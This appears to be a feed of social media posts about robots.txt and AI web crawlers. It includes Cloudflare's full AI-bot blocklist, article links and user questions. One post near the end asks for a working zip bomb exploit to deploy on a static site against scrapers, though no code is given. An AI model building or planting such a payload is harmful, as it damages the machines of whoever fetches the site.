I asked ChatGPT about the recent copyright news. It rehashed my latest column and misconstrued the facts. But why was it on my site at all?
https://www.plagiarismtoday.com/2025/07/23/chatgpt-ignores-robots-txt-rehashes-my-column/

I asked ChatGPT about the recent copyright news. It rehashed my latest column and misconstrued the facts. But why was it on my site at all?
https://www.plagiarismtoday.com/2025/07/23/chatgpt-ignores-robots-txt-rehashes-my-column/
Für Website- und Shopbetreiber: Lerne, wie du mit der robots.txt KI-Bots wie GPTBot, ClaudeBot & Google-Extended blockierst – ohne deine SEO-Rankings zu gefährden.
#Development #Trends
Who’s crawling your site in 2025 · The most active and blocked bots and crawlers https://ilo.im/1652mx
_____
#Bots #Crawlers #Website #Business #SEO #UserAgents #RobotsTxt #WebDev #Frontend #Backend
Here's #Cloudflare's #robots-txt file:
# Cloudflare Managed Robots.txt to block AI related bots.
User-agent: AI2Bot
Disallow: /
User-agent: Amazonbot
Disallow: /
User-agent: amazon-kendra
Disallow: /
User-agent: anthropic-ai
Disallow: /
User-agent: Applebot
Disallow: /
User-agent: Applebot-Extended
Disallow: /
User-agent: AwarioRssBot
Disallow: /
User-agent: AwarioSmartBot
Disallow: /
User-agent: bigsur.ai
Disallow: /
User-agent: Brightbot
Disallow: /
User-agent: Bytespider
Disallow: /
User-agent: ChatGPT-User
Disallow: /
User-agent: ClaudeBot
Disallow: /
User-agent: Diffbot
Disallow: /
User-agent: DigitalOceanGenAICrawler
Disallow: /
User-agent: DuckAssistBot
Disallow: /
User-agent: FacebookBot
Disallow: /
User-agent: FriendlyCrawler
Disallow: /
User-agent: Google-Extended
Disallow: /
User-agent: GPTBot
Disallow: /
User-agent: iaskspider/2.0
Disallow: /
User-agent: ICC-Crawler
Disallow: /
User-agent: img2dataset
Disallow: /
User-agent: Kangaroo Bot
Disallow: /
User-agent: LinerBot
Disallow: /
User-agent: MachineLearningForPeaceBot
Disallow: /
User-agent: Meltwater
Disallow: /
User-agent: meta-externalagent
Disallow: /
User-agent: meta-externalfetcher
Disallow: /
User-agent: Nicecrawler
Disallow: /
User-agent: OAI-SearchBot
Disallow: /
User-agent: omgili
Disallow: /
User-agent: omgilibot
Disallow: /
User-agent: PanguBot
Disallow: /
User-agent: PerplexityBot
Disallow: /
User-agent: Perplexity-User
Disallow: /
User-agent: PetalBot
Disallow: /
User-agent: PiplBot
Disallow: /
User-agent: QualifiedBot
Disallow: /
User-agent: Scoop.it
Disallow: /
User-agent: Seekr
Disallow: /
User-agent: SemrushBot-OCOB
Disallow: /
User-agent: Sidetrade indexer bot
Disallow: /
User-agent: Timpibot
Disallow: /
User-agent: VelenPublicWebCrawler
Disallow: /
User-agent: Webzio-Extended
Disallow: /
User-agent: YouBot
Disallow: /
#Business #Findings
Most blocked SEO bots · Insights from ~140 million websites https://ilo.im/16439x
_____
#SEO #Bots #Crawlers #Content #Website #Blog #RobotsTxt #Development #WebDev #Backend
#Business #Explorations
What would happen if I blocked big search? · Pros and cons of blocking major search engines https://ilo.im/163yb3
_____
#SearchEngine #SEO #AI #Website #Blog #RobotsTxt #Development #WebDev #Frontend #Backend
#Development #Findings
Most blocked AI bots · ”Block rates have increased significantly over the past year.” https://ilo.im/16425n
_____
#AI #Bots #Crawlers #Content #Website #Blog #RobotsTxt #WebDev #Backend
I've had the robots.txt to block ChatGPT from touching my site in place for months. Yet it's a referrer?
#Business #Guidelines
The Internet Archive opt-out itch · Ways to deal with your public internet history https://ilo.im/163ssx
_____
#InternetArchive #Internet #History #Consent #Trust #Transparency #Content #Blog #Website #RobotsTxt
#Google nutzt Inhalte für das #KI-Training auch dann, wenn Urheber dem widersprechen. Das wurde nun offiziell bestätigt.
Laut Google #Deepmind betrifft der Widerspruch nur bestimmte #Konzernbereiche. Wer seine Daten schützen will, muss die Seite komplett aus der #Google-Suche entfernen. #Verlage und #Webseitenbetreiber sehen sich dadurch wirtschaftlich benachteiligt.
Google outlines pathway for robots.txt protocol to evolve https://ppc.land/google-outlines-pathway-for-robots-txt-protocol-to-evolve/ #Google #RobotsTxt #WebCrawlers #SEO #DigitalMarketing
Google outlines pathway for robots.txt protocol to evolve: How the 30-year-old web crawler control standard could adopt new functionalities while maintaining its simplicity. https://ppc.land/google-outlines-pathway-for-robots-txt-protocol-to-evolve/ #Google #RobotsTxt #WebCrawlers #SEO #DigitalMarketing
#Business #Introductions
Meet LLMs.txt · A proposed standard for AI website content crawling https://ilo.im/16318s
_____
#SEO #GEO #AI #Bots #Crawlers #LlmsTxt #RobotsTxt #Development #WebDev #Backend
Tracked down my Forgejo CPU spikes with pprof: an otherwise acceptable crawler is indexing each commit of my personal weather station data. All 107,980 of them. Blame info, too.
Many Forgejo paths are nonsensical to crawl, even by good bots. Codeberg's robots.txt is a great start for these.
https://codeberg.org/robots.txt
This should both relieve pressure and expose more bad bots.
#Development #Reports
Google AI Mode is here · How to access it and control it with robots.txt https://ilo.im/162o8h
_____
#Business #Google #SearchEngine #AnswerEngine #AI #RobotsTxt #WebDev #Frontend #Backend
Hey does anyone know if there's still a working zip bomb style exploit that can be deployed on a static site/JS (or as a asset/resource)? Specifically to target web scrapers and AI bullshit? The second any server goes online now it's immediately bombarded by stupid numbers of requests.
Hi, got a question.
Is there a standard for Anti-AI/Anti-SEO etc robots.txt file? Or a trustworthy site that explains how to build one if prefab isn't available? Is there anything else I should consider?
Thanks.